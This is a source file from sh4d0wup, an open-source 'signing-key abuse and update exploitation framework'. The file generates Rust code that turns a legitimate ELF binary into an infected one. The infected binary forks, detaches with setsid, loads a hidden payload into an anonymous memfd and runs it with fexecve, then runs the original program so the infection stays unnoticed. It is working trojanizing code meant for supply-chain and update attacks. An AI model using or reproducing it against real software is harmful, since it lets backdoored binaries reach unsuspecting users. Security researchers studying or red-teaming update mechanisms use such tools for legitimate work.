sh4d0wup 0.11.0

Signing-key abuse and update exploitation framework
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130

use crate::codegen::{self, rust};
use crate::errors::*;
use crate::infect::elf::{Infect, Payload};
use std::path::Path;

pub async fn add_payload(compiler: &mut rust::Compiler, payload: &Payload<'_>) -> Result<()> {
    compiler.add_lines(&["unsafe { setsid() };\n"]).await?;

    match payload {
        Payload::Shell(payload) => {
            let mut buf = String::new();
            codegen::escape(payload.as_bytes(), &mut buf)?;

            /*
            compiler
                .add_lines(&[
                    &format!("char *args[]={{\"/bin/sh\", \"-c\", \"{}\", NULL}};\n", buf),
                    "execve(\"/bin/sh\", args, environ);\n",
                ])
                .await?;
            */

            // TODO
            bail!("Embedding a shell payload is not yet supported for the rust backend");
        }
        Payload::Elf(payload) => {
            compiler
                .add_lines(&[
                    "let name = CStr::from_bytes_with_nul(b\"\\x00\").unwrap();\n",
                    "let f = unsafe { memfd_create(name.as_ptr(), MFD_CLOEXEC) };\n",
                    "if f == -1 { exit(1) }\n",
                    "let mut f = unsafe { File::from_raw_fd(f) };\n",
                ])
                .await?;

            rust::stream_bin_std(payload, &mut compiler.stdin).await?;
            compiler
                .add_lines(&["unsafe { fexecve(f.as_raw_fd(), argv.as_ptr(), environ) };\n"])
                .await?;
        }
    }

    compiler
        .add_lines(&[
            // "unsafe { perror(CStr::from_bytes_with_nul(b\"exec\\x00\").unwrap().as_ptr()) };\n",
            "exit(1);\n",
        ])
        .await?;

    Ok(())
}

pub async fn infect(
    bin: &Path,
    config: &Infect,
    orig: &[u8],
    payload: Option<&Payload<'_>>,
) -> Result<()> {
    let mut compiler = rust::Compiler::spawn(bin, config.target.as_deref()).await?;

    info!("Generating source code...");
    compiler
        .add_lines(&[
            "#![allow(non_camel_case_types)]\n",
            "use std::env;\n",
            "use std::ffi::{CStr, CString, c_int, c_uint, c_char};\n",
            "use std::fs::File;\n",
            "use std::io::Write;\n",
            "use std::iter::once;\n",
            "use std::os::fd::{AsRawFd, FromRawFd};\n",
            "use std::os::unix::ffi::OsStrExt;\n",
            "use std::process::exit;\n",
            "use std::ptr;\n",
            "pub type pid_t = i32;\n",
            "const MFD_CLOEXEC: c_uint = 1;\n",
            "extern \"C\" {\n",
            "fn memfd_create(name: *const c_char, flags: c_uint) -> c_int;\n",
            "fn fork() -> pid_t;\n",
            "fn setsid() -> pid_t;\n",
            "fn fexecve(fd: c_int, argv: *const *const c_char, envp: *const *const c_char) -> c_int;\n",
            // "fn perror(s: *const c_char);\n",
            "static environ: *const *const c_char;\n",
            "}\n",
            "fn main() {\n",
            "let argv = env::args_os()
                .map(|s| CString::new(s.as_bytes()).unwrap())
                .collect::<Vec<_>>();\n",
            "let argv = argv.iter()
                .map(|s| s.as_ptr())
                .chain(once(ptr::null()))
                .collect::<Vec<_>>();\n",
        ])
        .await?;

    if let Some(payload) = &payload {
        compiler
            .add_lines(&["let c = unsafe { fork() };\n", "if c == 0 {\n"])
            .await?;
        add_payload(&mut compiler, payload).await?;
        compiler.add_line("}\n").await?;
    }

    if config.self_replace {
        bail!("The self-replace feature is currently not available with this compiler backend");
    }

    compiler
        .add_lines(&[
            "let name = CStr::from_bytes_with_nul(b\"\\x00\").unwrap();\n",
            "let f = unsafe { memfd_create(name.as_ptr(), MFD_CLOEXEC) };\n",
            "if f == -1 { exit(1) }\n",
            "let mut f = unsafe { File::from_raw_fd(f) };\n",
        ])
        .await?;

    rust::stream_bin_std(orig, &mut compiler.stdin).await?;

    compiler
        .add_lines(&[
            "unsafe { fexecve(f.as_raw_fd(), argv.as_ptr(), environ) };\n",
            "}\n",
        ])
        .await?;

    let mut pending = compiler.done();
    info!("Waiting for compile to finish...");
    pending.wait().await?;

    Ok(())
}